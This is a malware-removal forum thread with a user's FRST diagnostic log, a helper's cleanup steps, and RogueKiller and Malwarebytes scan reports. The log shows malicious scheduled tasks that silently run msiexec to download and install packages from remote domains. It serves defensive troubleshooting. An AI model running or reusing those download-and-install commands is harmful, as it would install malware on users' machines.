    Task: {9711D794-1AC7-4767-9653-E265DA25924D} - System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C} => C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe [1601-01-03] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
    Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
    Task: {A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2} - System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B} => "msiexec.exe" -q -i hxxps://refreshnerer711.info/vDgBc3c79u8.s27
    Task: {CE636CD2-BC9F-45B0-86B6-6533DEC76BA4} - System32\Tasks\hjuzju => "msiexec" -package hxxps://superdomain1709.info/hawbncj.mri /q
    Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ==================== Loaded Modules (Whitelisted) ==============

    2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
    2019-02-08 21:46 - 2019-02-07 20:09 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
    2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
    2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
    2019-02-08 21:47 - 2017-12-12 11:35 - 000281600 _____ () C:\Program Files (x86)\Multitimer\Multitimer.exe
    2019-02-08 23:02 - 2019-02-06 10:00 - 002684400 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000156656 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libegl.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
    2019-02-09 00:44 - 2019-02-09 00:44 - 001083392 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ () C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-09 00:44 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-0ODST.tmp\itdownload.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 texttotalk.org
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 technologievimy.com

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
    DNS Servers: Media is not connected to internet.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{2F9DA978-66F3-44BD-BE3B-F5490BFA7C57}] => (Allow) C:\Windows\rss\csrss.exe ()
    FirewallRules: [{11A88E17-3A04-4D89-B347-E025C0716D1A}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
    FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
    FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
    Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\

    Error: (02/09/2019 12:42:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 12:38:44 AM) (Source: Application Hang) (EventID: 1002) (User: )
    Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

    Process ID: 10e0

    Start Time: 01d4bfcbbc5e5969

    Termination Time: 4294967295

    Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe

    Report Id: f84380ae-2bbf-11e9-8d72-0026b664e783

    Faulting package full name:

    Faulting package-relative application ID:

    Error: (02/08/2019 11:15:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
    Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

    Process ID: 17e4

    Start Time: 01d4bfbec9052d5e

    Termination Time: 4294967295

    Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe

    Report Id: 5e394fbf-2bb4-11e9-8d71-0026b664e783

    Faulting package full name:

    Faulting package-relative application ID:

    Error: (02/08/2019 11:15:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/08/2019 11:15:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10240.16425, time stamp: 0x55bec5f5
    Faulting module name: CoreUIComponents.dll, version: 0.0.0.0, time stamp: 0x55d2cdf8
    Exception code: 0xc0000005
    Fault offset: 0x0000000000061f8e
    Faulting process id: 0x13e8
    Faulting application start time: 0x01d4bfbf1ac83bd3
    Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    Faulting module path: C:\Windows\system32\CoreUIComponents.dll
    Report Id: 8f9dc01a-6d94-4173-94ac-714bb15ffaf6
    Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy
    Faulting package-relative application ID: App


    System errors:
    =============
    Error: (02/09/2019 12:42:30 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.

    Error: (02/09/2019 12:42:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:31:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.

    Error: (02/09/2019 12:29:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
    Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_Session1 service to connect.

    Error: (02/09/2019 12:29:23 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/08/2019 11:05:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The NmU2M2EwMWU service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.


    Windows Defender:
    ===================================
    Date: 2019-02-08 22:58:52.037
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:28:36.285
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:22:31.668
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:08:55.987
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:00:18.323
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: Real-Time Protection
    Process Name: C:\Program Files\WinRAR\WinRAR.exe
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    ==================== Memory info ===========================

    Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
    Percentage of memory in use: 35%
    Total physical RAM: 8059.98 MB
    Available physical RAM: 5186.63 MB
    Total Virtual: 9979.98 MB
    Available Virtual: 6556.94 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:97.66 GB) (Free:80.22 GB) NTFS
    Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS

    \\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================

  3. #3
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    Please, observe following rules:

    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.



    ================================

    Uninstall following unwanted programs:

    CloudNet
    DiskWMpower
    Multitimer


    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Remove Selected.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.

    Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.

    Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8/10 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • A copy of all logfiles are saved to C:\AdwCleaner.

    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

  4. #4
    Join Date
    Jul 2008
    Posts
    232
    Here:

    Rougekiller REPORT 1:

    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
    Switches : -refid 3

    中中中中中中中中中中中中 Processes 中中中中中中中中中中中中

    中中中中中中中中中中中中 Process Modules 中中中中中中中中中中中中

    中中中中中中中中中中中中 Services 中中中中中中中中中中中中

    中中中中中中中中中中中中 Tasks 中中中中中中中中中中中中

    中中中中中中中中中中中中 Registry 中中中中中中中中中中中中

    中中中中中中中中中中中中 WMI 中中中中中中中中中中中中

    中中中中中中中中中中中中 Hosts File 中中中中中中中中中中中中

    中中中中中中中中中中中中 Files 中中中中中中中中中中中中
    [Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found

    中中中中中中中中中中中中 Web browsers 中中中中中中中中中中中中



    RougeKiller REPORT 2:

    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
    Switches : -refid 3

    中中中中中中中中中中中中 Processes 中中中中中中中中中中中中

    中中中中中中中中中中中中 Process Modules 中中中中中中中中中中中中

    中中中中中中中中中中中中 Services 中中中中中中中中中中中中

    中中中中中中中中中中中中 Tasks 中中中中中中中中中中中中

    中中中中中中中中中中中中 Registry 中中中中中中中中中中中中

    中中中中中中中中中中中中 WMI 中中中中中中中中中中中中

    中中中中中中中中中中中中 Hosts File 中中中中中中中中中中中中

    中中中中中中中中中中中中 Files 中中中中中中中中中中中中
    [Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found

    中中中中中中中中中中中中 Web browsers 中中中中中中中中中中中中

  5. #5
    Join Date
    Jul 2008
    Posts
    232
    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 2/9/19
    Scan Time: 12:07 PM
    Log File: 2ea0ec9e-2c20-11e9-a4d9-0026b664e783.json

    -Software Information-
    Version: 3.7.1.2839
    Components Version: 1.0.538
    Update Package Version: 1.0.9182
    License: Trial

    -System Information-
    OS: Windows 10 (Build 10240.16487)
    CPU: x64
    File System: NTFS
    User: DESKTOP-OHFLJFD\Thomazing!

    -Scan Summary-
    Scan Type: Threat Scan
    Scan Initiated By: Manual
    Result: Completed
    Objects Scanned: 255377
    Threats Detected: 264
    Threats Quarantined: 256
    Time Elapsed: 14 min, 31 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Detect
    PUM: Detect

    -Scan Details-
    Process: 2
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182

    Module: 2
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182

    Registry Key: 41
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\EpicNet Inc., Quarantined, [732], [451809],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON, Quarantined, [2805], [411133],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Quarantined, [797], [259987],1.0.9182
    Adware.Wajam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [494], [-1],0.0.0
    Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 1.0, Quarantined, [416], [533745],1.0.9182
    Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 2.0, Quarantined, [416], [533745],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Ebayssistant 1.0, Quarantined, [3714], [623237],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Look Picture Tool, Quarantined, [3714], [623238],1.0.9182
    Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\telezilla, Quarantined, [3714], [623239],1.0.9182
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\wewewe, Quarantined, [688], [339689],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME, Quarantined, [2805], [411132],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Quarantined, [797], [259989],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION, Quarantined, [446], [518477],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASAPI32, Quarantined, [779], [568552],1.0.9182
